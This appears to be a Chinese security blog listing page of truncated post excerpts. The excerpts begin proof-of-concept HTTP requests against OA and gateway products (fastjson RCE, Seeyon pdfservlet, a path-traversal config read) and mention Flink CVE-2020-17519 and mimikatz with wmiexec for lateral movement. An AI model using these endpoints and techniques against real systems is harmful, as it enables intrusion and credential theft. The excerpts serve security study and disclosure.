https://github.com/Tas9er/EgGateWayGetShell 使用jd-gui 解开 整理出POC 如下： POST /guest_auth/guestIsUp.php HTTP/1.1 Host: 192.168.10.1 Connection: ...

某OA 在某些低版本使用了fastjson  1.2.58  。导致了前台的一个fastjson 的Rce   User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Fi...

老版本 POST /seeyon/pdfservlet HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0 Accept: text/html,application...

/../conf/config.properties GET /../conf/config.properties HTTP/1.1 Host: 192.168.10.10:881 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5...

无意中某朋友发了一个客户系统源码给我。就顺着系统审计了一番。 总共审计了一个前台RCE、前台SQL 注入、后台RCE 、前台存储XSS、反射XSS  以及后台SQL 注入 源码就不发了。具体的代码如下：...

CVE-2020-17519 任意文件读取 https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519 访问8081 端口 http:/...

首先通过mimikatz 抓取明文密码 mimikatz  1.通过wmiexec https://github.com/maaaaz/impacket-examples-windows python  -m pip&nb...

随着疫情的发生导致了很多的东西未被实现，不管是学习还是工作方面的事情。对于自己定义的很多的目标还有一些没有实现。 不过还是非常的满意。2020 年有很多的可惜也有很多的欢喜，辛酸苦辣也尝...

原文地址：https://xz.aliyun.com/t/8618 试验环境：Centos8.2 pam版本1.3.1 [root@localhost ~]# cat /etc/redhat-release CentOS Linux release 8.2.2004 (Core) [root@localhost ~]# r...

POST /general/appbuilder/web/officeproduct/productapply/applyprobygroup HTTP/1.1 Host: 10.211.55.5 Content-Length: 39 Accept: */* DNT: 1 X-Requested-With: XMLHttpRequest ...